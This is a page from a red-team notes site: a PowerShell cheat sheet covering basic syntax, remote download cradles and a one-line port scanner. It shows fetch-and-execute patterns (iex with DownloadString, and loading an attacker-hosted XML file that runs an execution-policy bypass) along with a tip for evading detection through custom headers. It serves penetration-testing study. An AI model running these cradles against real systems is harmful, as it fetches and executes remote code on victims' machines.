Johnermac
  • About me
  • Active Directory
    • PowerShell
      • Customize
      • Notes
      • ETW
      • AMSI Bypass
      • Obfuscation
    • Enumeration
      • Domain
      • GPO
      • ACL
      • Domain Trusts
      • Forest
      • Extra
      • BloodHound
      • BloodHound CE
  • Tunneling
    • Tools
      • Udp2Raw
      • Fraud Bridge
      • Chisel
      • SSF
      • Egress-Assess
      • Ligolo-ng
      • Sshutle
      • Rpivot
      • Tunna
      • reGeorg
      • Neo-reGeorg
      • PivotSuite
  • Post-Exploitation
    • Data Exfiltration
      • HTTP
        • Cancel
        • wget
        • bash
        • busybox
        • IRB
        • PHP
        • Ruby
      • ICMP
        • XXD
        • Ruby
        • Python
      • UDP
        • Netcat
      • TCP
        • Netcat
        • KSH
        • whois
        • Finger
      • HTTPS
        • Python
        • OpenSSL
  • BLOG
    • Articles
      • Pivoting for Red Teaming
Powered by GitBook
On this page
  • Getting Start
  • Download Files
  • Some Examples:
  • Some usage Examples
  1. Active Directory

PowerShell

PowerShell is a powerful scripting language and command-line shell developed by Microsoft for automating administrative tasks and managing computer systems.

Getting Start 

% = foreach
$_ = current object 
example: 1,2,3,4 | % {$_+3} 
result : 4,5,6,7 
? = where
eq = equal
ne = not equal
like = similar/comparable
gt = greater than
lt = less than
example: Get-Service | ? {$_.Status -ne "Running"} 
select = Select-Object
example: Get-Service dhcp | select ServiceName CanPauseAndContinue,DisplayName

sls = Select-String
example: ls -r <path> -File *.txt | %{ sls -Path $_ -Pattern pass* }
Module:
C:\$Env:PsModulePath
all modules in this path are imported automatically

Get-Command -Module <module name>

Download Files

// A summary of methods we can use For "In-Memory" execution with PowerShell 2.0:
> Net.WebClient DownloadString Method
> Net.WebClient DownloadData Method
> Net.WebClient OpenRead Method
> .NET [Net.HttpWebRequest] class
> Word.Application COM Object
> Excel.Application COM Object
> InternetExplorer.Application COM Object
> MsXml2.ServerXmlHttp COM Object
> Certutil.exe w/ -ping argument

// A summary of methods we can use For "Disk-Based" execution with PowerShell 2.0:
> Net.WebClient DownloadFile method
> BITSAdmin.exe
> Certutil.exe w/ -urlcache argument

Some Examples:

New-Object:

$variable = New-Object System.Net.WebClient
$variable | gm   //gm = Get-Member
$address= "<web server/file>"
$path = "<full path/file>"
$variable.DownloadFile($address,$path)

Invoke-Expression:

iex $variable.DownloadString($address,$path)
//this will "download" the string of the file and the iex = Invoke-Expression will execute the string as a command

System.xml.XmlDocument:

First on Kali > open a webserver with a xml file:

<?xml version="1.0"?>
<command>
  <a>
    <execute>Set-ExecutionPolicy Bypass -Force -Scope CurrentUser</execute>
  </a>
  <b>
    <execute>Get-Process</execute>
  </b>
</command>
// On Target:
Target>
$docxml = New-Object System.Xml.XmlDocument
$docxml.Load("http://ip/arquivo.xml"); 
iex $docxml.command.a.execute

+Stealthy

Specify headers when download files, for example user-agent:

$variable.Headers.Add("user-agent","redteam")
iex $variable.DownloadString($address,$path)

Some usage Examples

Cmdlets associated with the process:

Get-Command *process* -CommandType cmdlet | Measure-Object

Cmdlets associated with "Set":

(Get-Command -CommandType cmdlet | Sort-Object Verb | sls ^Set).Count

4th process using more memory:

ps | Sort-Object -Property WS -Descending | Select-Object -Index 3

Simple PortScan:

1..1024 | %{echo ((new-object Net.Sockets.TcpClient).Connect("IP",$_)) "Port $_ is open"} 2>$null

PreviousAbout meNextCustomize

Last updated 1 year ago